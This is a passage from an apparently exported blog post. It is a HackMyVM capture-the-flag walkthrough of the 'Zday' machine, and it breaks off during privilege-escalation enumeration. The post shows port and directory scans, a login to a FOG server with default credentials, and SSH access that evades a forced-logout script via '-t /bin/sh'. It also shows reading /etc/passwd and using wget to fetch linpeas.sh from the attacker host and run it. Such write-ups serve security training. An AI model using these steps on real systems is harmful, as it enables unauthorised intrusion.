{"id":878,"date":"2025-06-14T23:56:21","date_gmt":"2025-06-14T15:56:21","guid":{"rendered":"http:\/\/162.14.82.114\/?p=878"},"modified":"2025-06-14T23:56:21","modified_gmt":"2025-06-14T15:56:21","slug":"hmv-_-zday","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/878\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Zday"},"content":{"rendered":"<h1>Zday<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355703.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355703.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613212601500\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355705.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355705.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614125319433\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.101:21\nOpen 192.168.10.101:80\nOpen 192.168.10.101:111\nOpen 192.168.10.101:443\nOpen 192.168.10.101:22\nOpen 192.168.10.101:2049\nOpen 192.168.10.101:3306\nOpen 192.168.10.101:33269\nOpen 192.168.10.101:38597\nOpen 192.168.10.101:43967\nOpen 192.168.10.101:57163\n\nPORT      STATE SERVICE  REASON         VERSION\n21\/tcp    open  ftp      syn-ack ttl 64 vsftpd 3.0.3\n22\/tcp    open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 ee:01:82:dc:7a:00:0e:0e:fc:d9:08:ca:d8:7e:e5:2e (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb8c11ZfAFQlWae9AFKD\/+qO6\/CQk\/5gupdrYoYCPR3eDEJeAab4rBHIejTWNW+k8vcPt632eGkauTuqIns+5gPEYh4mzHqjVsV1zcw7uTeIQbC94lrS3prhaFBnUcq69C9xIeAqO\/DKxiziuurpThhmiJfXY15mbhrpfUYupMFD\/voTA9YCfWN8ZYuOVqxNLp9R8te8G3qjRzGgmJpB7ze0lpVY8gYy9L7W\/WhUJcOZu0tv1FCWXaPYNOyiqB6RxuO5B9bZN6e4qpysT3uh41LfRehM\/8+1A3MX9zLjwJDwvt8a8Ou7Hm+ry5YiP8AY4qPX76HUImnVhSYZ0ImLdJ\n|   256 44:af:47:d8:9f:ea:ae:3e:9f:aa:ec:1d:fb:22:aa:0f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNYvN0uTaP4+w1s6xKfWhwDMsazhYYGfxu9t3YTJSlCMkfF5+qxoUrsnBrrP2W158sVb\/Dn0G31HWSmCuzrEG24=\n|   256 6a:fb:b4:13:64:df:6e:75:b2:b9:4e:f1:92:97:72:30 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINnksPNobxAvrBwITV+97e9Zuyt2kviSa6QiFGUavqDS\n80\/tcp    open  http     syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n111\/tcp   open  rpcbind  syn-ack ttl 64 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   
100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100003  3           2049\/udp   nfs\n|   100003  3           2049\/udp6  nfs\n|   100003  3,4         2049\/tcp   nfs\n|   100003  3,4         2049\/tcp6  nfs\n|   100005  1,2,3      32986\/udp   mountd\n|   100005  1,2,3      33269\/tcp   mountd\n|   100005  1,2,3      50373\/tcp6  mountd\n|   100005  1,2,3      57610\/udp6  mountd\n|   100021  1,3,4      38098\/udp6  nlockmgr\n|   100021  1,3,4      38597\/tcp   nlockmgr\n|   100021  1,3,4      41313\/tcp6  nlockmgr\n|   100021  1,3,4      57425\/udp   nlockmgr\n|   100227  3           2049\/tcp   nfs_acl\n|   100227  3           2049\/tcp6  nfs_acl\n|   100227  3           2049\/udp   nfs_acl\n|_  100227  3           2049\/udp6  nfs_acl\n443\/tcp   open  http     syn-ack ttl 64 Apache httpd 2.4.38\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n2049\/tcp  open  nfs      syn-ack ttl 64 3-4 (RPC #100003)\n3306\/tcp  open  mysql    syn-ack ttl 64 MariaDB 5.5.5-10.3.27\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1\n|   Thread ID: 89\n|   Capabilities flags: 63486\n|   Some Capabilities: InteractiveClient, SupportsTransactions, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Support41Auth, ODBCClient, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, FoundRows, SupportsLoadDataLocal, SupportsCompression, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: _K8xt^X|-f;2(r(ke8&#039;W\n|_  Auth Plugin Name: mysql_native_password\n33269\/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)\n38597\/tcp open  nlockmgr syn-ack ttl 64 1-4 (RPC #100021)\n43967\/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)\n57163\/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)\nMAC 
Address: 08:00:27:75:4B:D0 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        1l        3w       16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET      368l      933w    10701c http:\/\/192.168.10.101\/index.html\n302      GET        0l        0w        0c http:\/\/192.168.10.101\/index.php =&gt; http:\/\/192.168.10.101\/fog\/index.php\n200      GET       24l      126w    10356c http:\/\/192.168.10.101\/icons\/openlogo-75.png\n200      GET      368l      933w    10701c http:\/\/192.168.10.101\/\n301      GET        9l       28w      314c http:\/\/192.168.10.101\/fog =&gt; http:\/\/192.168.10.101\/fog\/\n302      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      322c http:\/\/192.168.10.101\/fog\/service =&gt; http:\/\/192.168.10.101\/fog\/service\/\n301      GET        9l       28w      325c http:\/\/192.168.10.101\/fog\/management =&gt; http:\/\/192.168.10.101\/fog\/management\/\n301      GET        9l       28w      326c http:\/\/192.168.10.101\/fog\/fog\/service =&gt; http:\/\/192.168.10.101\/fog\/fog\/service\/\n301      GET        9l       28w      329c http:\/\/192.168.10.101\/fog\/fog\/management =&gt; 
http:\/\/192.168.10.101\/fog\/fog\/management\/\n301      GET        9l       28w      336c http:\/\/192.168.10.101\/fog\/fog\/management\/images =&gt; http:\/\/192.168.10.101\/fog\/fog\/management\/images\/\n301      GET        9l       28w      332c http:\/\/192.168.10.101\/fog\/management\/images =&gt; http:\/\/192.168.10.101\/fog\/management\/images\/\n301      GET        9l       28w      318c http:\/\/192.168.10.101\/fog\/lib =&gt; http:\/\/192.168.10.101\/fog\/lib\/\n301      GET        9l       28w      321c http:\/\/192.168.10.101\/fog\/status =&gt; http:\/\/192.168.10.101\/fog\/status\/\n301      GET        9l       28w      335c http:\/\/192.168.10.101\/fog\/fog\/management\/other =&gt; http:\/\/192.168.10.101\/fog\/fog\/management\/other\/\n301      GET        9l       28w      329c http:\/\/192.168.10.101\/fog\/fog\/lib\/events =&gt; http:\/\/192.168.10.101\/fog\/fog\/lib\/events\/\n301      GET        9l       28w      322c http:\/\/192.168.10.101\/fog\/fog\/lib =&gt; http:\/\/192.168.10.101\/fog\/fog\/lib\/\n301      GET        9l       28w      324c http:\/\/192.168.10.101\/fog\/lib\/pages =&gt; http:\/\/192.168.10.101\/fog\/lib\/pages\/\n301      GET        9l       28w      328c http:\/\/192.168.10.101\/fog\/fog\/lib\/pages =&gt; http:\/\/192.168.10.101\/fog\/fog\/lib\/pages\/<\/code><\/pre>\n<p>I did not scan any deeper; there did not seem to be much else...<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Sensitive Port Probing<\/h3>\n<p>The scan did not report anonymous FTP login; I tried it anyway and it failed:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.101:~&gt; ls                          \n`ls&#039; at 0 [530 Login incorrect.] 
<\/code><\/pre>\n<h3>Sensitive Directories<\/h3>\n<p>Let's see what this <code>fog<\/code> directory is:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ whatweb http:\/\/$IP\/fog                                                                   \nhttp:\/\/192.168.10.101\/fog [301 Moved Permanently] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101], RedirectLocation[http:\/\/192.168.10.101\/fog\/], Title[301 Moved Permanently]\nhttp:\/\/192.168.10.101\/fog\/ [302 Found] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101], RedirectLocation[.\/management\/index.php]\nhttp:\/\/192.168.10.101\/fog\/management\/index.php [200 OK] Apache[2.4.38], Bootstrap[135], Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[fogproject.org@gmail.com], HTML5, HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101], JQuery, PasswordField[upass], Script[text\/javascript], Strict-Transport-Security[max-age=31536000], Title[Login], UncommonHeaders[x-content-type-options,content-security-policy,access-control-allow-origin], X-Frame-Options[sameorigin], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block]<\/code><\/pre>\n<p>Not much gained; all it turns up is a login page... Opening it to take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355707.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355707.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130205146\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Default User Login<\/h3>\n<p>I briefly looked up related vulnerabilities, but I did not know the version. This is an open-source project, and the credits section at the bottom of the page shows the relevant information. My first thought was to try logging in with the default username and password, then to try SQL injection if that failed, and to look at other sources of information if that failed too. As it turned out, the default user could log in!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355708.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355708.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130648746\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Or: <a 
href=\"https:\/\/wiki.fogproject.org\/wiki\/index.php?title=Password_Central\">https:\/\/wiki.fogproject.org\/wiki\/index.php?title=Password_Central<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355709.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355709.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130721336\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Trying to log in:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355710.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355710.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130834975\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I looked for anywhere that would allow command execution and found none, but I did see other relevant information:<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355711.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355711.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614131128379\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Found the version number. With no other entry point, you can search Google for known vulnerabilities, and that turned up this:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355712.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355712.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614131431559\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>One credential shown there is <code>fogproject:84D1gia!8M9HSsR8gXau<\/code>; trying to log in with it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ ssh fogproject@$IP\nThe authenticity of host &#039;192.168.10.101 
(192.168.10.101)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:QFnr8PHYAdXYbwD9yLU2dbRjl4cTUg0VRu+X+5GzDw8.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.10.101&#039; (ED25519) to the list of known hosts.\nfogproject@192.168.10.101&#039;s password: \nLinux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nYou seem to be using the &#039;fogproject&#039; system account to logon and work \non your FOG server system.\n\nIt&#039;s NOT recommended to use this account! Please create a new \naccount for administrative tasks.\n\nIf you re-run the installer it would reset the &#039;fog&#039; account \npassword and therefore lock you out of the system!\n\nTake care, \nyour FOGproject team\nConnection to 192.168.10.101 closed.<\/code><\/pre>\n<p>The session was cut off. Is this for security reasons? Trying to bypass it:<\/p>\n<pre><code class=\"language-bash\"># ssh fogproject@$IP -t bash --noprofile\n# ssh fogproject@$IP -t \/bin\/bash                                          \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ ssh fogproject@$IP -t \/bin\/sh  \nfogproject@192.168.10.101&#039;s password: 84D1gia!8M9HSsR8gXau\n$ whoami;id\nfogproject\nuid=1001(fogproject) gid=1001(fogproject) groups=1001(fogproject)<\/code><\/pre>\n<p>It turns out <code>sh<\/code> works normally!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355713.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355713.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614131853476\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">$ pwd\n\/home\/fogproject\n$ ls -la\ntotal 32\ndrwxr-xr-x 4 fogproject fogproject 4096 Jun 14 01:15 .\ndrwxr-xr-x 4 root       root       4096 Mar 10  2021 ..\n-rw-r--r-- 1 fogproject fogproject  220 Apr 18  2019 .bash_logout\n-rw-r--r-- 1 fogproject fogproject 3899 Mar 10  2021 .bashrc\ndrwxr-xr-x 3 fogproject fogproject 4096 Mar 10  2021 .config\ndrwx------ 3 fogproject fogproject 4096 Jun 14 01:15 .gnupg\n-rw-r--r-- 1 fogproject fogproject  807 Apr 18  2019 .profile\n-rwxr-xr-x 1 fogproject fogproject  681 Mar 10  2021 warnfogaccount.sh\n$ cat warnfogaccount.sh\n#!\/bin\/bash\ntitle=&quot;FOG system account&quot;\ntext=&quot;You seem to be using the &#039;fogproject&#039; system account to logon and work \\non your FOG server system.\\n\\nIt&#039;s NOT recommended to use this account! 
Please create a new \\naccount for administrative tasks.\\n\\nIf you re-run the installer it would reset the &#039;fog&#039; account \\npassword and therefore lock you out of the system!\\n\\nTake care, \\nyour FOGproject team&quot;\nz=$(which zenity)\nx=$(which xmessage)\nn=$(which notify-send)\nif [[ -x &quot;$z&quot; ]]\nthen\n    $z --error --width=480 --text=&quot;$text&quot; --title=&quot;$title&quot;\nelif [[ -x &quot;$x&quot; ]]\nthen\n    echo -e &quot;$text&quot; | $x -center -file -\nelse\n    $n -u critical &quot;$title&quot; &quot;$(echo $text | sed -e &#039;s\/ \\n\/ \/g&#039;)&quot;\nfi<\/code><\/pre>\n<p>This script is used to <strong>detect use of the <code>fogproject<\/code> system account to log in to the FOG server and warn the user against it<\/strong>. It pops up the warning through one of three possible GUI\/notification tools (<code>zenity<\/code>, <code>xmessage<\/code>, <code>notify-send<\/code>), tried in order from highest to lowest priority.<\/p>\n<p>I tried deleting it and logging in again, but still only <code>sh<\/code> works:<\/p>\n<pre><code class=\"language-bash\">$ bash\nYou seem to be using the &#039;fogproject&#039; system account to logon and work \non your FOG server system.\n\nIt&#039;s NOT recommended to use this account! Please create a new \naccount for administrative tasks.\n\nIf you re-run the installer it would reset the &#039;fog&#039; account \npassword and therefore lock you out of the system!\n\nTake care, \nyour FOGproject team<\/code><\/pre>\n<pre><code class=\"language-bash\">$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for fogproject: \nSorry, user fogproject may not run sudo on zday.\n$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n$ echo 1\n1\n$ find \/ -perm -u=s -type f 2&gt;\/dev\/null &gt; \/tmp\/log\n$ cat \/tmp\/log\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/mount.nfs\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd 
Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nestas:x:1000:1000:estas,,,:\/home\/estas:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:106:113:MySQL Server,,,:\/nonexistent:\/bin\/false\n_rpc:x:107:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:108:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\ntftp:x:109:114:tftp daemon,,,:\/srv\/tftp:\/usr\/sbin\/nologin\nftp:x:110:115:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nfogproject:x:1001:1001::\/home\/fogproject:\/bin\/bash\n$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nestas\nsshd\nfogproject\n$ ls -la \/home\/\ntotal 16\ndrwxr-xr-x  4 root       root       4096 Mar 10  2021 .\ndrwxr-xr-x 21 root       root       4096 Mar 10  2021 ..\ndrwxr-xr-x  3 estas      estas      4096 Mar 10  2021 estas\ndrwxr-xr-x  4 fogproject fogproject 4096 Jun 14 01:29 fogproject<\/code><\/pre>\n<p>Uploading <code>linpeas.sh<\/code> for enumeration:<\/p>\n<pre><code class=\"language-bash\">$ cd \/tmp\n$ wget http:\/\/192.168.10.102:8888\/linpeas.sh\n$ chmod +x linpeas.sh\n$ .\/linpeas.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355714.png'><img class=\"lazyload lazyload-style-2\" 